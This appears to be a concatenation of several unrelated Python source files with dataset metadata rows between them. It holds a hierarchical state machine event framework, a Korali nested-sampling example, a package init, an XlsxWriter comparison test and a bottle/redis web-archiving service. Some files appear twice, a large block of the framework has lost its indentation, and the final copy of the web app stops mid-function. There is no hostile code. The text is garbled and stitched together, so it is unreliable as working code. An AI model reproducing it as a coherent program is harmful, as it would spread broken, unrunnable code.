    # (ignore a NotImplementedError on Windows)
    try:
        _event_loop.add_signal_handler(signal.SIGINT, lambda: Framework.stop())
        _event_loop.add_signal_handler(signal.SIGTERM, lambda: Framework.stop())
        # print_info is still a staticmethod object at class-definition time;
        # __func__ unwraps the plain callable for the signal handler.
        _event_loop.add_signal_handler(29, print_info.__func__)
    except NotImplementedError:
        pass
def run_forever():
    """Run the asyncio event loop until interrupted.

    On KeyboardInterrupt, Framework.stop() is invoked so every state
    machine executes its EXIT path before the loop is closed.
    """
    event_loop = asyncio.get_event_loop()
    try:
        event_loop.run_forever()
    except KeyboardInterrupt:
        Framework.stop()
    event_loop.close()
class Ahsm(Hsm):
    """An Augmented Hierarchical State Machine (AHSM); a.k.a. ActiveObject/AO.
    Adds a priority, message queue and methods to work with the queue.
    """

    def start(self, priority, initEvent=None):
        """Register this actor with the Framework and run its initial transition."""
        # The priority must be assigned before Framework.add(), which reads it.
        self.priority = priority
        Framework.add(self)
        self.mq = collections.deque()
        self.init(self, initEvent)
        # Run to completion
        Framework._event_loop.call_soon_threadsafe(Framework.run)

    def postLIFO(self, evt):
        """Queue evt so it is the very next event dispatched."""
        self.mq.append(evt)

    def postFIFO(self, evt):
        """Queue evt behind any events already waiting."""
        self.mq.appendleft(evt)

    def pop_msg(self):
        """Remove and return the next event to dispatch."""
        return self.mq.pop()

    def has_msgs(self):
        """Return True when at least one event is queued."""
        return bool(self.mq)
class TimeEvent(object):
    """A time-delayed event bound to a target Ahsm.

    A TimeEvent carries a (signal, value) pair that the Framework
    delivers to its target actor after a delay.  One-shot delivery is
    armed with postAt()/postIn(); periodic delivery with postEvery().
    """

    def __init__(self, signame):
        assert type(signame) == str
        self.signal = Signal.register(signame)
        self.value = None

    def _arm(self, act, interval):
        # Record the target actor and repeat interval (0 means one-shot)
        # prior to handing this event to the Framework's scheduler.
        assert issubclass(type(act), Ahsm)
        self.act = act
        self.interval = interval

    def postAt(self, act, abs_time):
        """Post this event to act at the absolute loop time abs_time (one-shot)."""
        self._arm(act, 0)
        Framework.addTimeEventAt(self, abs_time)

    def postIn(self, act, delta):
        """Post this event to act after delta seconds (one-shot)."""
        self._arm(act, 0)
        Framework.addTimeEvent(self, delta)

    def postEvery(self, act, delta):
        """Post this event to act after delta seconds and every delta thereafter."""
        self._arm(act, delta)
        Framework.addTimeEvent(self, delta)

    def disarm(self):
        """Remove this TimeEvent from the Framework's active time events."""
        self.act = None
        Framework.removeTimeEvent(self)
from .VcdSpy import VcdSpy
| 37.072306 | 101 | 0.614668 | import asyncio
import collections
import math
import signal
import sys
from functools import wraps
class Spy(object):
    """Debugging hook point for farc; inert until enable_spy() installs a driver."""

    # The currently-active Spy driver class, or None when spying is disabled.
    _actv_cls = None

    @staticmethod
    def enable_spy(spy_cls):
        # Install spy_cls as the active driver and let it initialize itself.
        Spy._actv_cls = spy_cls
        spy_cls.init()

    def __getattr__(*args):
        # args[0] is self, args[1] is the requested attribute name.
        # Resolve "enable_spy" by name, then the active driver's attribute,
        # otherwise return a no-op that swallows any arguments.
        if args[1] == "enable_spy":
            return Spy.enable_spy
        if Spy._actv_cls:
            return getattr(Spy._actv_cls, args[1])
        return lambda *x: None
Spy = Spy()
class Signal(object):
    """Registry mapping signal names to unique integer signal ids."""

    _registry = {}  # signal name (str) -> signal id (int)
    _lookup = []    # signal id (int) -> signal name (str)

    @staticmethod
    def exists(signame):
        # True if the name has already been registered.
        return signame in Signal._registry

    @staticmethod
    def register(signame):
        # Idempotently register signame and return its signal id.
        assert type(signame) is str
        if signame in Signal._registry:
            return Signal._registry[signame]
        else:
            sigid = len(Signal._lookup)
            Signal._registry[signame] = sigid
            Signal._lookup.append(signame)
            Spy.on_signal_register(signame, sigid)
            return sigid

    def __getattr__(self, signame):
        # Allow Signal.<NAME> attribute access to look up a registered id.
        assert type(signame) is str
        return Signal._registry[signame]
# Singleton: replace the Signal class with an instance so that
# Signal.<NAME> attribute lookups go through __getattr__.
Signal = Signal()

# Reserved (system) signals; ids 0..3 are assigned in registration order.
Signal.register("EMPTY")
Signal.register("ENTRY")
Signal.register("EXIT")
Signal.register("INIT")
# Signals that mirror POSIX signals
Signal.register("SIGINT")
Signal.register("SIGTERM")

Event = collections.namedtuple("Event", ["signal", "value"])
Event.__doc__ = """Events are a tuple of (signal, value) that are passed from
one AHSM to another. Signals are defined in each AHSM's source code
by name, but resolve to a unique number. Values are any python value,
including containers that contain even more values. Each AHSM state
(static method) accepts an Event as the parameter and handles the event
based on its Signal."""
# Instantiate the reserved (system) events
Event.EMPTY = Event(Signal.EMPTY, None)
Event.ENTRY = Event(Signal.ENTRY, None)
Event.EXIT = Event(Signal.EXIT, None)
Event.INIT = Event(Signal.INIT, None)
# Events for POSIX signals
Event.SIGINT = Event(Signal.SIGINT, None)  # (i.e. Ctrl+C)
Event.SIGTERM = Event(Signal.SIGTERM, None)  # (i.e. kill <pid>)
# The order of this tuple MUST match their respective signals
Event.reserved = (Event.EMPTY, Event.ENTRY, Event.EXIT, Event.INIT)
class Hsm(object):
    """A Hierarchical State Machine (HSM) with nested states,
    guaranteed entry/exit execution, and nested initial transitions.
    State handlers are @state-decorated static methods taking (me, event)
    and returning one of the RET_* codes below.
    """

    # Every state handler must return one of these values
    RET_HANDLED = 0
    RET_IGNORED = 1
    RET_TRAN = 2
    RET_SUPER = 3

    def __init__(self,):
        # self.state is the Hsm/act's current active state.
        # It starts at the default handler, top; the hardcoded
        # initial state is the subclass's _initial method.
        self.state = self.top
        self.initial_state = self._initial

    def _initial(self, event):
        # Subclasses must override this with their own initial state.
        raise NotImplementedError

    def state(func):
        """Decorator marking a method as a state handler; the presence of
        the farc_state attribute (not its value) denotes statehood.
        """
        @wraps(func)
        def func_wrap(self, evt):
            result = func(self, evt)
            Spy.on_state_handler_called(func_wrap, evt, result)
            return result
        setattr(func_wrap, "farc_state", True)
        return staticmethod(func_wrap)

    # Helpers that feed reserved events to a state handler
    @staticmethod
    def trig(me, state_func, signal): return state_func(me, Event.reserved[signal])

    @staticmethod
    def enter(me, state_func): return state_func(me, Event.ENTRY)

    @staticmethod
    def exit(me, state_func): return state_func(me, Event.EXIT)

    # Helpers used inside state handlers to report the outcome
    @staticmethod
    def handled(me, event): return Hsm.RET_HANDLED

    @staticmethod
    def tran(me, nextState): me.state = nextState; return Hsm.RET_TRAN

    @staticmethod
    def super(me, superState): me.state = superState; return Hsm.RET_SUPER

    @state
    def top(me, event):
        # Default handler: only SIGINT/SIGTERM are handled (forcing the
        # EXIT path to run up to here); everything else is ignored.
        if Event.SIGINT == event:
            return Hsm.RET_HANDLED
        if Event.SIGTERM == event:
            return Hsm.RET_HANDLED
        return Hsm.RET_IGNORED

    @staticmethod
    def _perform_init_chain(me, current):
        """Follow the chain of INIT transitions starting from current;
        return the leaf state reached.
        """
        t = current
        while Hsm.trig(me, t if t != Hsm.top else me.initial_state, Signal.INIT) == Hsm.RET_TRAN:
            # top does not handle INIT, so defer to me.initial_state there.
            path = []  # trace the path back to t via superstates
            while me.state != t:
                path.append(me.state)
                Hsm.trig(me, me.state, Signal.EMPTY)
            me.state = path[0]
            assert len(path) < 32  # MAX_NEST_DEPTH
            path.reverse()
            # Perform ENTRY for each state from current down to the target
            for s in path:
                Hsm.enter(me, s)
            t = path[-1]  # check whether the new target also handles INIT
        return t

    @staticmethod
    def _perform_transition(me, source, target):
        """Execute the exit/entry actions for a transition from source to
        target (QP transition cases (a)-(h)).
        """
        s, t = source, target
        path = [t]
        if s == t:  # transition to self
            Hsm.exit(me, s)
            Hsm.enter(me, t)
        else:
            Hsm.trig(me, t, Signal.EMPTY)
            t = me.state  # t is now parent of target
            if s == t:  # source is parent of target
                Hsm.enter(me, path[0])
            else:
                Hsm.trig(me, s, Signal.EMPTY)
                if me.state == t:  # source and target share a parent
                    Hsm.exit(me, s)
                    Hsm.enter(me, path[0])
                else:
                    if me.state == path[0]:  # target is parent of source
                        Hsm.exit(me, s)
                    else:  # is the source an ancestor of the target?
                        lca_found = False
                        path.append(t)
                        t = me.state  # t is now parent of source
                        me.state = path[1]
                        # Save ancestors of target until source or top is found
                        while me.state != Hsm.top:
                            Hsm.trig(me, me.state, Signal.EMPTY)
                            path.append(me.state)
                            assert len(path) < 32  # MAX_NEST_DEPTH
                            if me.state == s:
                                lca_found = True
                                break
                        if lca_found:  # enter states down to the target
                            for st in reversed(path[:-1]):
                                Hsm.enter(me, st)
                        else:
                            Hsm.exit(me, s)
                            me.state = t
                            # Exit superstates until the LCA is reached
                            while me.state not in path:
                                if Hsm.exit(me, me.state) == Hsm.RET_HANDLED:
                                    Hsm.trig(me, me.state, Signal.EMPTY)
                            t = me.state
                            # Step into children until the target is entered
                            for st in reversed(path[:path.index(t)]):
                                Hsm.enter(me, st)

    @staticmethod
    def init(me, event=None):
        # The initial state is not invoked directly here so an Ahsm's
        # _initial() isn't executed twice; _perform_init_chain does it.
        me.state = Hsm._perform_init_chain(me, Hsm.top)

    @staticmethod
    def dispatch(me, event):
        """Dispatch event to this Hsm, climbing superstates until it is
        handled or top() is reached, then performing any transition.
        """
        Spy.on_hsm_dispatch_event(event)
        t = me.state  # save the current state
        exit_path = []
        r = Hsm.RET_SUPER
        # Climb superstates until one responds, recording the path
        while r == Hsm.RET_SUPER:
            s = me.state
            exit_path.append(s)
            Spy.on_hsm_dispatch_pre(s)
            r = s(me, event)
        Spy.on_hsm_dispatch_post(exit_path)
        if r == Hsm.RET_TRAN:
            t = me.state  # target of the requested transition
            # Exit up to (but not including) the handling state s
            for st in exit_path[:-1]:
                r = Hsm.exit(me, st)
                assert (r == Hsm.RET_SUPER) or (r == Hsm.RET_HANDLED)
            s = exit_path[-1]
            Hsm._perform_transition(me, s, t)
            t = Hsm._perform_init_chain(me, t)
        me.state = t  # restore/commit the state
class Framework(object):
_event_loop = asyncio.get_event_loop()
_ahsm_registry = []
# within the Ahsm.start() method
# when the Ahsm is added to the Framework.
# The dict's key is the priority (integer) and the value is the Ahsm.
_priority_dict = {}
_time_events = {}
_tm_event_handle = None
_subscriber_table = {}
@staticmethod
def post(event, act):
assert isinstance(act, Ahsm)
act.postFIFO(event)
@staticmethod
def post_by_name(event, act_name):
assert type(act_name) is str
for act in Framework._ahsm_registry:
if act.__class__.__name__ == act_name:
act.postFIFO(event)
@staticmethod
def publish(event):
if event.signal in Framework._subscriber_table:
for act in Framework._subscriber_table[event.signal]:
act.postFIFO(event)
Framework._event_loop.call_soon_threadsafe(Framework.run)
@staticmethod
def subscribe(signame, act):
sigid = Signal.register(signame)
if sigid not in Framework._subscriber_table:
Framework._subscriber_table[sigid] = []
Framework._subscriber_table[sigid].append(act)
@staticmethod
def addTimeEvent(tm_event, delta):
expiration = Framework._event_loop.time() + delta
Framework.addTimeEventAt(tm_event, expiration)
@staticmethod
def addTimeEventAt(tm_event, abs_time):
assert tm_event not in Framework._time_events.values()
Framework._insortTimeEvent(tm_event, abs_time)
@staticmethod
def _insortTimeEvent(tm_event, expiration):
now = Framework._event_loop.time()
if expiration < now:
tm_event.act.postFIFO(tm_event)
while expiration in Framework._time_events.keys():
m, e = math.frexp(expiration)
expiration = (m + sys.float_info.epsilon) * 2**e
Framework._time_events[expiration] = tm_event
# If this is the only active TimeEvent, schedule its callback
if len(Framework._time_events) == 1:
Framework._tm_event_handle = Framework._event_loop.call_at(
expiration, Framework.timeEventCallback, tm_event, expiration)
# If there are other TimeEvents,
# check if this one should replace the scheduled one
else:
if expiration < min(Framework._time_events.keys()):
Framework._tm_event_handle.cancel()
Framework._tm_event_handle = Framework._event_loop.call_at(
expiration, Framework.timeEventCallback, tm_event,
expiration)
@staticmethod
def removeTimeEvent(tm_event):
for k,v in Framework._time_events.items():
if v is tm_event:
# If the event being removed is scheduled for callback,
# cancel and schedule the next event if there is one
if k == min(Framework._time_events.keys()):
del Framework._time_events[k]
if Framework._tm_event_handle:
Framework._tm_event_handle.cancel()
if len(Framework._time_events) > 0:
next_expiration = min(Framework._time_events.keys())
next_event = Framework._time_events[next_expiration]
Framework._tm_event_handle = \
Framework._event_loop.call_at(
next_expiration, Framework.timeEventCallback,
next_event, next_expiration)
else:
Framework._tm_event_handle = None
else:
del Framework._time_events[k]
break
    @staticmethod
    def timeEventCallback(tm_event, expiration):
        """Event-loop callback fired when a TimeEvent expires: deliver the
        event to its Ahsm, re-arm it if periodic, schedule the next pending
        event's callback, and trigger a run-to-completion pass.
        """
        assert expiration in Framework._time_events.keys(), (
            "Exp:%d _time_events.keys():%s" %
            (expiration, Framework._time_events.keys()))
        # Remove this expired TimeEvent from the active list
        del Framework._time_events[expiration]
        Framework._tm_event_handle = None
        # Post the event to the target Ahsm
        tm_event.act.postFIFO(tm_event)
        # If this is a periodic time event, schedule its next expiration
        if tm_event.interval > 0:
            Framework._insortTimeEvent(tm_event,
                                       expiration + tm_event.interval)
        # If not set already and there are more events, set the next event callback
        if (Framework._tm_event_handle == None and
                len(Framework._time_events) > 0):
            next_expiration = min(Framework._time_events.keys())
            next_event = Framework._time_events[next_expiration]
            Framework._tm_event_handle = Framework._event_loop.call_at(
                next_expiration, Framework.timeEventCallback, next_event,
                next_expiration)
        # Run to completion
        Framework._event_loop.call_soon_threadsafe(Framework.run)
    @staticmethod
    def add(act):
        """Register an Ahsm with the Framework; its priority must be
        unique among all registered Ahsms.
        """
        Framework._ahsm_registry.append(act)
        assert act.priority not in Framework._priority_dict, (
            "Priority MUST be unique")
        Framework._priority_dict[act.priority] = act
        Spy.on_framework_add(act)
@staticmethod
def run():
getPriority = lambda x : x.priority
while True:
allQueuesEmpty = True
sorted_acts = sorted(Framework._ahsm_registry, key=getPriority)
for act in sorted_acts:
if act.has_msgs():
event_next = act.pop_msg()
act.dispatch(act, event_next)
allQueuesEmpty = False
break
if allQueuesEmpty:
return
    @staticmethod
    def stop():
        """Shut down the Framework: cancel the pending timer callback,
        post EXIT to every Ahsm, run to completion, and stop the asyncio
        event loop.
        """
        # Disable the timer callback
        if Framework._tm_event_handle:
            Framework._tm_event_handle.cancel()
            Framework._tm_event_handle = None
        # Post EXIT to all Ahsms
        for act in Framework._ahsm_registry:
            Framework.post(Event.EXIT, act)
        # Run to completion and stop the asyncio event loop
        Framework.run()
        Framework._event_loop.stop()
        Spy.on_framework_stop()
    @staticmethod
    def print_info():
        """Print the class name and current state of every registered Ahsm."""
        for act in Framework._ahsm_registry:
            print(act.__class__.__name__, act.state.__name__)
    # Bind a useful set of POSIX signals to the handler
    # (ignore a NotImplementedError on Windows)
    try:
        _event_loop.add_signal_handler(signal.SIGINT, lambda: Framework.stop())
        _event_loop.add_signal_handler(signal.SIGTERM, lambda: Framework.stop())
        # Signal 29 is SIGIO on Linux / SIGINFO on BSD — presumably a
        # "dump status" trigger; TODO confirm the intended platform.
        # .__func__ unwraps the staticmethod object, which is what
        # print_info is at class-body scope.
        _event_loop.add_signal_handler(29, print_info.__func__)
    except NotImplementedError:
        pass
    def run_forever():
        """Run the asyncio event loop until KeyboardInterrupt, then stop
        the Framework and close the loop.

        Note: defined without @staticmethod; calling
        Framework.run_forever() still works on Python 3 because functions
        accessed on the class are not bound.
        """
        loop = asyncio.get_event_loop()
        try:
            loop.run_forever()
        except KeyboardInterrupt:
            Framework.stop()
        loop.close()
class Ahsm(Hsm):
    """An Augmented Hierarchical State Machine: an Hsm plus a unique
    priority and a message queue, scheduled by the Framework.
    """
    def start(self, priority, initEvent=None):
        # must set the priority before Framework.add() which uses the priority
        self.priority = priority
        Framework.add(self)
        self.mq = collections.deque()
        self.init(self, initEvent)
        # Run to completion
        Framework._event_loop.call_soon_threadsafe(Framework.run)
    def postLIFO(self, evt):
        # pop_msg() pops from the right, so a right-append gives LIFO order.
        self.mq.append(evt)
    def postFIFO(self, evt):
        # pop_msg() pops from the right, so a left-append gives FIFO order.
        self.mq.appendleft(evt)
    def pop_msg(self,):
        """Remove and return the next event from this Ahsm's queue."""
        return self.mq.pop()
    def has_msgs(self,):
        """Return True when this Ahsm has queued events awaiting dispatch."""
        return len(self.mq) > 0
class TimeEvent(object):
    """An event the Framework delivers to an Ahsm at a point in time,
    either once (postAt / postIn) or periodically (postEvery).
    """
    def __init__(self, signame):
        assert type(signame) == str
        self.signal = Signal.register(signame)
        self.value = None

    def _arm(self, act, interval):
        """Record the target Ahsm and repeat interval (0 means one-shot)."""
        assert issubclass(type(act), Ahsm)
        self.act = act
        self.interval = interval

    def postAt(self, act, abs_time):
        """Deliver once, at the given absolute event-loop time."""
        self._arm(act, 0)
        Framework.addTimeEventAt(self, abs_time)

    def postIn(self, act, delta):
        """Deliver once, `delta` seconds from now."""
        self._arm(act, 0)
        Framework.addTimeEvent(self, delta)

    def postEvery(self, act, delta):
        """Deliver every `delta` seconds until disarmed."""
        self._arm(act, delta)
        Framework.addTimeEvent(self, delta)

    def disarm(self):
        """Cancel any pending delivery of this event."""
        self.act = None
        Framework.removeTimeEvent(self)
from .VcdSpy import VcdSpy
| true | true |
79010c0207408da28515534c467c346ef64752c3 | 1,836 | py | Python | examples/bayesian.inference/reference/run-nested.py | JonathanLehner/korali | 90f97d8e2fed2311f988f39cfe014f23ba7dd6cf | [
"MIT"
] | 43 | 2018-07-26T07:20:42.000Z | 2022-03-02T10:23:12.000Z | examples/bayesian.inference/reference/run-nested.py | JonathanLehner/korali | 90f97d8e2fed2311f988f39cfe014f23ba7dd6cf | [
"MIT"
] | 212 | 2018-09-21T10:44:07.000Z | 2022-03-22T14:33:05.000Z | examples/bayesian.inference/reference/run-nested.py | JonathanLehner/korali | 90f97d8e2fed2311f988f39cfe014f23ba7dd6cf | [
"MIT"
] | 16 | 2018-07-25T15:00:36.000Z | 2022-03-22T14:19:46.000Z | #!/usr/bin/env python3
# In this example, we demonstrate how Korali samples the posterior distribution
# in a bayesian problem where the likelihood is calculated by providing
# reference data points and their objective values.
# Importing the computational model
import sys
sys.path.append('./_model')  # make the example's model module importable
from model import *

# Creating new experiment
import korali
e = korali.Experiment()

# Setting up the reference likelihood for the Bayesian Problem
e["Problem"]["Type"] = "Bayesian/Reference"
e["Problem"]["Likelihood Model"] = "Normal"
e["Problem"]["Reference Data"] = getReferenceData()
e["Problem"]["Computational Model"] = lambda sampleData: model(sampleData, getReferencePoints())

# Configuring Nested Sampling parameters
e["Solver"]["Type"] = "Sampler/Nested"
e["Solver"]["Resampling Method"] = "Ellipse"
e["Solver"]["Number Live Points"] = 1500

# Configuring the problem's random distributions
e["Distributions"][0]["Name"] = "Uniform 0"
e["Distributions"][0]["Type"] = "Univariate/Uniform"
e["Distributions"][0]["Minimum"] = 0.0
e["Distributions"][0]["Maximum"] = +5.0

# Configuring the problem's variables and their prior distributions
e["Variables"][0]["Name"] = "a"
e["Variables"][0]["Prior Distribution"] = "Uniform 0"
e["Variables"][1]["Name"] = "b"
e["Variables"][1]["Prior Distribution"] = "Uniform 0"
e["Variables"][2]["Name"] = "[Sigma]"
e["Variables"][2]["Prior Distribution"] = "Uniform 0"

# Output cadence and termination criteria
e["File Output"]["Frequency"] = 1000
e["Console Output"]["Frequency"] = 500
e["Console Output"]["Verbosity"] = 'Detailed'
e["Solver"]["Termination Criteria"]["Max Generations"] = 100000
e["Solver"]["Termination Criteria"]["Min Log Evidence Delta"] = 1e-1

# Configuring output settings
e["File Output"]["Path"] = '_korali_result_nested'

# Starting Korali's Engine and running experiment
k = korali.Engine()
k.run(e)
| 33.381818 | 96 | 0.712418 |
# NOTE(review): comment-stripped duplicate of the run-nested.py example that
# precedes it in this file (dataset-concatenation artifact); code unchanged.
import sys
sys.path.append('./_model')
from model import *
import korali
e = korali.Experiment()
e["Problem"]["Type"] = "Bayesian/Reference"
e["Problem"]["Likelihood Model"] = "Normal"
e["Problem"]["Reference Data"] = getReferenceData()
e["Problem"]["Computational Model"] = lambda sampleData: model(sampleData, getReferencePoints())
e["Solver"]["Type"] = "Sampler/Nested"
e["Solver"]["Resampling Method"] = "Ellipse"
e["Solver"]["Number Live Points"] = 1500
e["Distributions"][0]["Name"] = "Uniform 0"
e["Distributions"][0]["Type"] = "Univariate/Uniform"
e["Distributions"][0]["Minimum"] = 0.0
e["Distributions"][0]["Maximum"] = +5.0
# Configuring the problem's variables and their prior distributions
e["Variables"][0]["Name"] = "a"
e["Variables"][0]["Prior Distribution"] = "Uniform 0"
e["Variables"][1]["Name"] = "b"
e["Variables"][1]["Prior Distribution"] = "Uniform 0"
e["Variables"][2]["Name"] = "[Sigma]"
e["Variables"][2]["Prior Distribution"] = "Uniform 0"
e["File Output"]["Frequency"] = 1000
e["Console Output"]["Frequency"] = 500
e["Console Output"]["Verbosity"] = 'Detailed'
e["Solver"]["Termination Criteria"]["Max Generations"] = 100000
e["Solver"]["Termination Criteria"]["Min Log Evidence Delta"] = 1e-1
e["File Output"]["Path"] = '_korali_result_nested'
k = korali.Engine()
k.run(e)
| true | true |
79010c959b42f908fa66615dfe288111925993ee | 402 | py | Python | bruges/util/__init__.py | EvanBianco/bruges | 344238775961369740d36ee9aea368be006ba7fe | [
"Apache-2.0"
] | 209 | 2015-07-16T18:23:42.000Z | 2022-02-27T02:59:46.000Z | bruges/util/__init__.py | EvanBianco/bruges | 344238775961369740d36ee9aea368be006ba7fe | [
"Apache-2.0"
] | 74 | 2015-07-12T16:12:01.000Z | 2022-02-22T14:27:26.000Z | bruges/util/__init__.py | agilescientific/bruges | a94ec307bac5e343680c63b315d43ef8b05ee4a1 | [
"Apache-2.0"
] | 112 | 2015-08-07T14:12:11.000Z | 2022-02-10T14:12:50.000Z | from .util import rms
from .util import moving_average
from .util import moving_avg_conv
from .util import moving_avg_fft
from .util import normalize
from .util import next_pow2
from .util import top_and_tail
from .util import extrapolate
from .util import nearest
from .util import deprecated
from .util import apply_along_axis
from .util import sigmoid
from .util import power
from .util import root
| 26.8 | 34 | 0.825871 | from .util import rms
from .util import moving_average
from .util import moving_avg_conv
from .util import moving_avg_fft
from .util import normalize
from .util import next_pow2
from .util import top_and_tail
from .util import extrapolate
from .util import nearest
from .util import deprecated
from .util import apply_along_axis
from .util import sigmoid
from .util import power
from .util import root
| true | true |
79010caebcd9e060069a269d44301af6d68bad2d | 911 | py | Python | xlsxwriter/test/comparison/test_default_row03.py | timgates42/XlsxWriter | 129044ed821de67895b4562c6b71f90eba5be6b4 | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | xlsxwriter/test/comparison/test_default_row03.py | timgates42/XlsxWriter | 129044ed821de67895b4562c6b71f90eba5be6b4 | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | xlsxwriter/test/comparison/test_default_row03.py | timgates42/XlsxWriter | 129044ed821de67895b4562c6b71f90eba5be6b4 | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | ###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2020, John McNamara, jmcnamara@cpan.org
#
from ..excel_comparsion_test import ExcelComparisonTest
from ...workbook import Workbook
class TestCompareXLSXFiles(ExcelComparisonTest):
    """
    Compare a workbook produced by XlsxWriter against one created by Excel.
    """

    def setUp(self):
        # Reference workbook to compare the generated file against.
        self.set_filename('default_row03.xlsx')

    def test_create_file(self):
        """Workbook with a default row height of 24 and rows 1-8 set."""
        workbook = Workbook(self.got_filename)
        worksheet = workbook.add_worksheet()

        # Default height 24; the truthy second argument presumably enables
        # "hide unused rows" — see set_default_row in the XlsxWriter docs.
        worksheet.set_default_row(24, 1)

        worksheet.write('A1', 'Foo')
        worksheet.write('A10', 'Bar')

        for row_num in range(1, 9):
            worksheet.set_row(row_num, 24)

        workbook.close()

        self.assertExcelEqual()
| 22.775 | 79 | 0.593853 | true | true | |
79010cb1b045ae5add7ef48709cc5cd240c0a5a5 | 3,898 | py | Python | web/app.py | ikreymer/archivethiswebsite | 0c6a3da6d822ffbd979769c78c9bc7254510697d | [
"MIT"
] | 4 | 2015-06-03T20:18:39.000Z | 2015-06-12T16:12:12.000Z | web/app.py | n0ncetonic/browsertrix | a822cfe2be38ebd6a7e4b61904473600d21950bf | [
"MIT"
] | null | null | null | web/app.py | n0ncetonic/browsertrix | a822cfe2be38ebd6a7e4b61904473600d21950bf | [
"MIT"
] | null | null | null | from bottle import route, Route, request, default_app, view, HTTPError, response
from redis import StrictRedis
from redis.utils import pipeline
import json
import uwsgi
import os
import logging
import requests
from config import get_config
from worker import get_cache_key, get_wait_key, get_queue_key
from worker import init_redis
# WSGI application object; assigned for real by init() at the bottom of the file.
application = None

# Fallback payload returned when no result could be produced for a url.
ERROR_RESP = {'archived': False, 'queued': False, 'error': {'msg': 'unknown'}}
def init():
    """ Init the application and add routes """
    # Configure root logging before any route handler runs.
    logging.basicConfig(format='%(asctime)s: [%(levelname)s]: %(message)s',
                        level=logging.DEBUG)
    # Module-level config and redis connection shared by all handlers.
    global theconfig
    theconfig = get_config()
    global rc
    rc = init_redis(theconfig)
    app = default_app()
    return app
@route(['/', '/index.html', '/index.htm'])
@view('index')
def home():
    """Render the index template with the configured archive list."""
    return {'archives': theconfig['archives'],
            'default_archive': theconfig.get('default_archive')}
def get_params():
    """Read the url/archive/browser query parameters, validate them, and
    return (browser_type, archive, url).  Raises HTTPError 400 on missing
    url or unknown archive.
    """
    url = request.query.get('url')
    archive = request.query.get('archive')
    browser_type = request.query.get('browser', 'chrome')
    if not url:
        raise HTTPError(status=400, body='No url= specified')
    if archive not in theconfig['archives']:
        raise HTTPError(status=400, body='No archive {0}'.format(archive))
    # Default to http:// when no scheme was supplied.
    if not url.startswith(('http://', 'https://')):
        url = 'http://' + url
    return browser_type, archive, url
@route('/archivepage')
def archive_page():
    """Queue the url for archiving (unless already cached) and report the
    current status: queue position while pending, or the cached result
    with its remaining TTL.
    """
    browser_type, archive, url = get_params()
    response_key = get_cache_key(archive, browser_type, url)
    wait_key = get_wait_key(archive, browser_type, url)
    queue_key = get_queue_key(browser_type)
    result = None
    if not rc.exists(response_key):
        # Not cached: enqueue the full query string as a job for the worker.
        cmd = dict(request.query)
        cmd['url'] = url
        num = rc.incr('total_urls:' + browser_type)
        cmd['num'] = num
        cmd = json.dumps(cmd)
        # Atomically store the "queued" placeholder and push the job.
        with pipeline(rc) as pi:
            waiting_str = {'archived': False,
                           'queued': True,
                           'num': num}
            pi.set(response_key, json.dumps(waiting_str))
            pi.rpush(queue_key, cmd)
        # Block until the worker signals completion or the timeout expires.
        rc.blpop(wait_key, theconfig['wait_timeout_secs'])
    result = rc.get(response_key)
    if result:
        result = json.loads(result)
        if 'queued' in result:
            result['queue_pos'] = 0
            front = rc.lindex(queue_key, 0)
            if front:
                front = json.loads(front)
                front_num = front.get('num', 0)
                # pos == 1 implies this url is next up
                # pos <= 0 implies this url was removed from queue and is being processed
                pos = result['num'] - front_num + 1
                result['queue_pos'] = pos
        else:
            result['ttl'] = rc.ttl(response_key)
    else:
        result = ERROR_RESP
    return result
@route('/download')
def download():
    """Proxy the archived result's download from the remote archive.

    Looks up the cached result for the requested url, streams the stored
    download URL (forwarding any saved session cookie) and passes through
    the relevant upstream response headers.  Raises HTTPError 404 when the
    url is not archived or has no download, 400 when the upstream fetch
    fails.
    """
    browser_type, archive, url = get_params()

    response_key = get_cache_key(archive, browser_type, url)

    result = rc.get(response_key)
    if not result:
        raise HTTPError(status=404, body='Url Not Archived')

    result = json.loads(result)
    if 'download_url' not in result:
        raise HTTPError(status=404, body='Download Not Available')

    headers = {}
    session = result.get('download_session')
    if session:
        headers['Cookie'] = session

    r = requests.get(result['download_url'],
                     headers=headers,
                     stream=True)

    if r.status_code != 200:
        raise HTTPError(status=400, body='Invalid Download Result: {0} {1}'.format(r.status_code, r.reason))

    pass_headers = ('Content-Disposition', 'Content-Length', 'Content-Type')
    for h in pass_headers:
        # Only forward headers the upstream actually sent; previously an
        # absent header was passed to set_header() as None.
        value = r.headers.get(h)
        if value is not None:
            response.set_header(h, value)

    response.body = r.iter_content()
    return response
# Build the WSGI application object that uwsgi serves.
application = init()
| 24.670886 | 108 | 0.611339 | from bottle import route, Route, request, default_app, view, HTTPError, response
from redis import StrictRedis
from redis.utils import pipeline
import json
import uwsgi
import os
import logging
import requests
from config import get_config
from worker import get_cache_key, get_wait_key, get_queue_key
from worker import init_redis
# NOTE(review): comment-stripped duplicate of the web-app module above
# (dataset-concatenation artifact); code kept byte-identical.
application = None
ERROR_RESP = {'archived': False, 'queued': False, 'error': {'msg': 'unknown'}}
def init():
    logging.basicConfig(format='%(asctime)s: [%(levelname)s]: %(message)s',
                        level=logging.DEBUG)
    global theconfig
    theconfig = get_config()
    global rc
    rc = init_redis(theconfig)
    app = default_app()
    return app
@route(['/', '/index.html', '/index.htm'])
@view('index')
def home():
    return {'archives': theconfig['archives'],
            'default_archive': theconfig.get('default_archive')}
def get_params():
    url = request.query.get('url')
    archive = request.query.get('archive')
    browser_type = request.query.get('browser', 'chrome')
    if not url:
        raise HTTPError(status=400, body='No url= specified')
    if archive not in theconfig['archives']:
        raise HTTPError(status=400, body='No archive {0}'.format(archive))
    if not url.startswith(('http://', 'https://')):
        url = 'http://' + url
    return browser_type, archive, url
@route('/archivepage')
def archive_page():
    browser_type, archive, url = get_params()
    response_key = get_cache_key(archive, browser_type, url)
    wait_key = get_wait_key(archive, browser_type, url)
    queue_key = get_queue_key(browser_type)
    result = None
    if not rc.exists(response_key):
        cmd = dict(request.query)
        cmd['url'] = url
        num = rc.incr('total_urls:' + browser_type)
        cmd['num'] = num
        cmd = json.dumps(cmd)
        with pipeline(rc) as pi:
            waiting_str = {'archived': False,
                           'queued': True,
                           'num': num}
            pi.set(response_key, json.dumps(waiting_str))
            pi.rpush(queue_key, cmd)
        rc.blpop(wait_key, theconfig['wait_timeout_secs'])
    result = rc.get(response_key)
    if result:
        result = json.loads(result)
        if 'queued' in result:
            result['queue_pos'] = 0
